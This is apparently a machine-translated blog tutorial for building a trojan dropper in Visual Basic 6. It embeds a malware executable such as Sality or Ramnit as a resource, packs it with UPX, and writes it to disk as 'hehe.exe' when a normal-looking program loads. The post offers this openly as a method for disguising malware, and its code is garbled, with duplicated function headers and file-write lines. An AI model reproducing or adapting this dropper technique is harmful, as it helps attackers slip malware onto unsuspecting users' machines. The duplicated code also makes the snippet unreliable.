Fake Application Executable File Drop action, such as some type of Trojan that when run looks like a normal program but secretly extracting the [drop] the other files and then extract the file is executed to carry out the action. .
Okay, to the ways of making, first open your Microsoft Visual Basic 6, create a new project with standard EXE, then create one new form.
Select Menu Tools - Resource Editor, and then click the icon Add Custom ResourceSee the picture:
Select the executable file that you want such as Sality or Ramnit is fine. Then Open, the file will be made into a resource file had the extension. RES, which can be saved into the program. Executable files can you pack first with UPX, Mpress and so that the file size is much smaller.
When will save the resource, name your own example project1.RESAfter the success of "attaching" malware or other programs into the main program, then type the following code to the form:
'create a function to extract file KeluarkanFile
Private Function KeluarkanFile (JenisRes As String, IDRes As Long, OFile As String)
Private Function KeluarkanFile (JenisRes As String, IDRes As Long, OFile As String)
Dim DROP () As Byte
DROP = LoadResData (IDRes, JenisRes)
DROP = LoadResData (IDRes, JenisRes)
Open OFile For Binary As # 1
Put # 1,, DROP
Close # 1
Put # 1,, DROP
Close # 1
end Function
'This function will be called when the program is loaded into memory
Private Sub Form_Load ()
'keluarkanfile function is called when the program is executed, rename your own hehe.exe
'keluarkanfile function is called when the program is executed, rename your own hehe.exe
KeluarkanFile "CUSTOM", 101, App.Path & "\ hehe.exe"
MsgBox "File successfully extracted", vbinformation, "Info"
MsgBox "File successfully extracted", vbinformation, "Info"
end Sub
Save the project and then run it, it will display the file named hehe.exe in the same directory as your project is
Note: The program does not directly run the extracted file, please add their own code.
Thanks, Michael Webster
No comments:
Post a Comment